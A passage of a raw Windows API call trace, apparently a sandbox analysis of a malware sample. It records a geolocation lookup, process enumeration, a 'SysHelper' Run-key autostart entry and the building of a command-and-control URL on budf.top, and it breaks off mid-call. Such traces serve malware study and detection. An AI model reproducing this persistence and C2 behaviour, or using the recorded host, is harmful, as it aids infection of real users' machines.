(HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1ae8) returned 0x80 [0153.436] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1ae8, Size=0x84) returned 0x2e1ae8 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0153.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x15) returned 0x2e1a50 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x2e1a50, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0153.436] GetLastError () returned 0x0 [0153.436] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1ae8) returned 0x84 [0153.436] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1ae8, Size=0x88) returned 0x2e1ae8 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0153.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1e) returned 0x2df9f8 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x2df9f8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0153.436] GetLastError () returned 0x0 [0153.436] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1ae8) returned 0x88 [0153.436] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1ae8, Size=0x8c) returned 0x2e1ae8 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0153.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2a) returned 0x2db958 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x2db958, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0153.436] GetLastError () returned 0x0 [0153.436] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1ae8) returned 0x8c [0153.436] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1ae8, Size=0x90) returned 0x2e1ae8 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0153.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x12) returned 0x2e1a70 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x2e1a70, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0153.436] GetLastError () returned 0x0 [0153.436] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1ae8) returned 0x90 [0153.436] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1ae8, Size=0x94) returned 0x2e1ae8 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0153.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x18) returned 0x2e1b88 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x2e1b88, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0153.436] GetLastError () returned 0x0 [0153.436] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1ae8) returned 0x94 [0153.436] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1ae8, Size=0x98) returned 0x2e1ae8 [0153.436] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0153.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x46) returned 0x2d73e8 [0153.437] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x2d73e8, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0153.437] GetLastError () returned 0x0 [0153.437] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1ae8) returned 0x98 [0153.437] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1ae8, Size=0x9c) returned 0x2e1ba8 [0153.437] GetLastError () returned 0x0 [0153.521] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1540) returned 0x80 [0153.521] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1540) returned 0x80 [0153.521] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1540) returned 0x80 [0153.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ec) returned 0x2e1fe8 [0153.558] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1540) returned 0x80 [0153.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2def50 [0153.558] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1540) returned 0x80 [0153.559] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1540) returned 0x80 [0153.559] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1540) returned 0x80 [0153.618] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1540) returned 0x80 [0153.628] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0153.951] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2d6310 [0153.951] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0167.626] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18ba58, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e258 | out: lpBuffer=0x18ba58*, lpdwNumberOfBytesRead=0x18e258*=0x22a) returned 1 [0167.626] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0167.626] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0167.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2eddd8 [0167.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x240) returned 0x32ef800 [0167.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ef800 | out: hHeap=0x2c0000) returned 1 [0167.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eddd8 | out: hHeap=0x2c0000) returned 1 [0167.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d6310 | out: hHeap=0x2c0000) returned 1 [0167.654] GetCurrentProcess () returned 0xffffffff [0167.654] GetLastError () returned 0x0 [0167.654] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0167.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x313cc0 [0167.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ec) returned 0x32d0da8 [0167.681] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x314718 [0167.681] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x314718, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xd0 [0167.681] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a") returned 1 [0167.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x32d16a0 [0167.686] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart" [0167.687] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart", pNumArgs=0x18e338 | out: pNumArgs=0x18e338) returned 0x32ef800*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0167.687] lstrcpyW (in: lpString1=0x18efc8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0167.700] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart" [0167.700] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart", pNumArgs=0x18e2d4 | out: pNumArgs=0x18e2d4) returned 0x32ef800*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0167.700] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" [0167.700] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74eb0000 [0167.700] GetProcAddress (hModule=0x74eb0000, lpProcName="EnumProcesses") returned 0x0 [0167.700] GetProcAddress (hModule=0x74eb0000, lpProcName="EnumProcessModules") returned 0x0 [0167.701] GetProcAddress (hModule=0x74eb0000, lpProcName="GetModuleBaseNameW") returned 0x0 [0167.701] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x76340000 [0167.737] GetProcAddress (hModule=0x76340000, lpProcName="EnumProcesses") returned 0x76341544 [0167.737] GetProcAddress (hModule=0x76340000, lpProcName="EnumProcessModules") returned 0x76341408 [0167.737] GetProcAddress (hModule=0x76340000, lpProcName="GetModuleBaseNameW") returned 0x7634152c [0167.737] EnumProcesses (in: lpidProcess=0x183ad0, cb=0xa000, lpcbNeeded=0x18e2e0 | out: lpidProcess=0x183ad0, lpcbNeeded=0x18e2e0) returned 1 [0167.739] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0167.739] CloseHandle (hObject=0x0) returned 0 [0167.739] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0167.739] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.740] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x33c) returned 0x0 [0167.740] CloseHandle (hObject=0x0) returned 0 [0167.741] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x374) returned 0x0 [0167.741] CloseHandle (hObject=0x0) returned 0 [0167.741] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3b0) returned 0x0 [0167.741] CloseHandle (hObject=0x0) returned 0 [0167.741] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf0) returned 0x0 [0167.741] CloseHandle (hObject=0x0) returned 0 [0167.741] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x13c) returned 0x5a4 [0167.741] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0167.741] CloseHandle (hObject=0x5a4) returned 1 [0167.741] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x37c) returned 0x5a4 [0167.741] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0167.741] CloseHandle (hObject=0x5a4) returned 1 [0167.741] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x414) returned 0x5a4 [0167.741] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0167.741] CloseHandle (hObject=0x5a4) returned 1 [0167.742] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x44c) returned 0x0 [0167.742] CloseHandle (hObject=0x0) returned 0 [0167.742] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4d0) returned 0x5a4 [0167.742] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0167.743] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x400000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned 0x7f [0167.743] CloseHandle (hObject=0x5a4) returned 1 [0167.743] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x514) returned 0x0 [0167.743] CloseHandle (hObject=0x0) returned 0 [0167.743] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x524) returned 0x5a4 [0167.743] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 1 [0167.744] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x400000, lpBaseName=0x18dad0, nSize=0x400 | out: lpBaseName="reader_sl.exe") returned 0xd [0167.744] CloseHandle (hObject=0x5a4) returned 1 [0167.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x558) returned 0x5a4 [0167.745] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0167.745] CloseHandle (hObject=0x5a4) returned 1 [0167.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x574) returned 0x0 [0167.745] CloseHandle (hObject=0x0) returned 0 [0167.745] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4cc) returned 0x5a4 [0167.745] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18e2ec, cb=0x4, lpcbNeeded=0x18e2d0 | out: lphModule=0x18e2ec, lpcbNeeded=0x18e2d0) returned 0 [0167.745] CloseHandle (hObject=0x5a4) returned 1 [0167.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2ea608 [0167.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c14d0 [0167.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f5f70 [0167.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32d1eb8 [0167.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32d2120 [0167.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32d2388 [0167.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32d25f0 [0167.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32d2858 [0167.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32d2ac0 [0167.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e73e0 [0167.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e7648 [0167.757] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18e2d0 | out: phkResult=0x18e2d0*=0x5a4) returned 0x0 [0167.758] RegQueryValueExW (in: hKey=0x5a4, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18e2cc, lpData=0x18c9f8, lpcbData=0x18e2b0*=0x400 | out: lpType=0x18e2cc*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart", lpcbData=0x18e2b0*=0x1be) returned 0x0 [0167.758] RegCloseKey (hKey=0x5a4) returned 0x0 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c0) returned 0x32e78b0 [0167.758] lstrlenA (lpString="\" --AutoStart") returned 13 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1b0) returned 0x32e7a78 [0167.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e78b0 | out: hHeap=0x2c0000) returned 1 [0167.758] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe") returned 1 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1b0) returned 0x32e78b0 [0167.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e7a78 | out: hHeap=0x2c0000) returned 1 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x2ea938 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e7a68 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e7cd0 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e7f38 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e81a0 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e8408 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e8670 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c7e50 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c80b8 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c8320 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32c8588 [0167.758] lstrlenA (lpString="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned 46 [0167.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x3842a8 [0167.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e7a68, cbMultiByte=-1, lpWideCharStr=0x3842a8, cchWideChar=47 | out: lpWideCharStr="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned 47 [0167.759] lstrcatW (in: lpString1="", lpString2="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0167.759] lstrlenA (lpString="") returned 0 [0167.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x3277068 [0167.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e7cd0, cbMultiByte=-1, lpWideCharStr=0x3277068, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.759] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0167.759] lstrlenA (lpString="") returned 0 [0167.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x3277088 [0167.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e7f38, cbMultiByte=-1, lpWideCharStr=0x3277088, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.759] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0167.759] lstrlenA (lpString="") returned 0 [0167.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x3277058 [0167.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e81a0, cbMultiByte=-1, 